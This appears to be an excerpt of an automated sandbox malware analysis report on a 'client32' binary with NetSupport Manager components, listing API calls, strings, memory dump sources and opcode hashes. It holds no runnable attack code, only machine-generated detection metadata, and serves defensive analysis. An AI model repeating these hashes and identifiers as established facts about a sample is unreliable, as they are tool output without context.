                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: FlashWindowEx
                                                                                                • API String ID: 199729137-2859592226
                                                                                                • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                APIs
                                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 110010A6
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 2046328329-2830328467
                                                                                                • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11001066
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 819365019-2830328467
                                                                                                • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                APIs
                                                                                                • PostMessageA.USER32 ref: 11001113
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 110010F6
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 906220102-2830328467
                                                                                                • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                • m_hWnd, xrefs: 110151B6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                • m_hWnd, xrefs: 11017206
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                • API String ID: 819365019-3966830984
                                                                                                • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                APIs
                                                                                                • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11001136
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 1604732272-2830328467
                                                                                                • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                APIs
                                                                                                • KillTimer.USER32 ref: 1100102B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 11001016
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 2229609774-2830328467
                                                                                                • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                                • LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D5F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoadVersion
                                                                                                • String ID: AudioCapture.dll
                                                                                                • API String ID: 3209957514-2642820777
                                                                                                • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                                • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110155A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateFileHandle
                                                                                                • String ID: \\.\NSWFPDrv
                                                                                                • API String ID: 3498533004-85019792
                                                                                                • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: IsA()$NSMString.cpp
                                                                                                • API String ID: 269201875-2362537096
                                                                                                • Opcode ID: 68d67adba3b792a3b76b297a6ece0cba9d6ec4ae3df73479a5d21533772aba25
                                                                                                • Instruction ID: 17388535e6c5badee4eb9af04060c7a893d398ad281bb0e33101b8b46c6c7982
                                                                                                • Opcode Fuzzy Hash: 68d67adba3b792a3b76b297a6ece0cba9d6ec4ae3df73479a5d21533772aba25
                                                                                                • Instruction Fuzzy Hash: 6CD023FA82450117C55CDF547C01D4933840F0522CF448475FF9C6FA40F7105C4711A2
                                                                                                APIs
                                                                                                • FindWindowA.USER32 ref: 1111316A
                                                                                                • SendMessageA.USER32(00000000,00000414,00000000,00000000,?,1111EE7B,00000000,00000000), ref: 11113180
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FindMessageSendWindow
                                                                                                • String ID: MSOfficeWClass
                                                                                                • API String ID: 1741975844-970895155
                                                                                                • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                APIs
                                                                                                • DestroyWindow.USER32 ref: 1115F338
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                • API String ID: 1417657345-2201682149
                                                                                                • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(00000000), ref: 69CFDAE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event
                                                                                                • String ID: Refcount.cpp$this->hReadyEvent
                                                                                                • API String ID: 4201588131-2118820724
                                                                                                • Opcode ID: 572918dc6c52284db6772a373ad46de79f3e5ec017f82c5883d293ff7761300f
                                                                                                • Instruction ID: 3b659e604659da12b9dc511cb032499690d92fef483db57957e7997741f8ed9a
                                                                                                • Opcode Fuzzy Hash: 572918dc6c52284db6772a373ad46de79f3e5ec017f82c5883d293ff7761300f
                                                                                                • Instruction Fuzzy Hash: 37D02271804210AFD620CB14F906BCA72A88F40759F008039F30A62808E7A0A84E8B88
                                                                                                APIs
                                                                                                • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 1101D3A3
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 1590435379-2830328467
                                                                                                • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                                • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384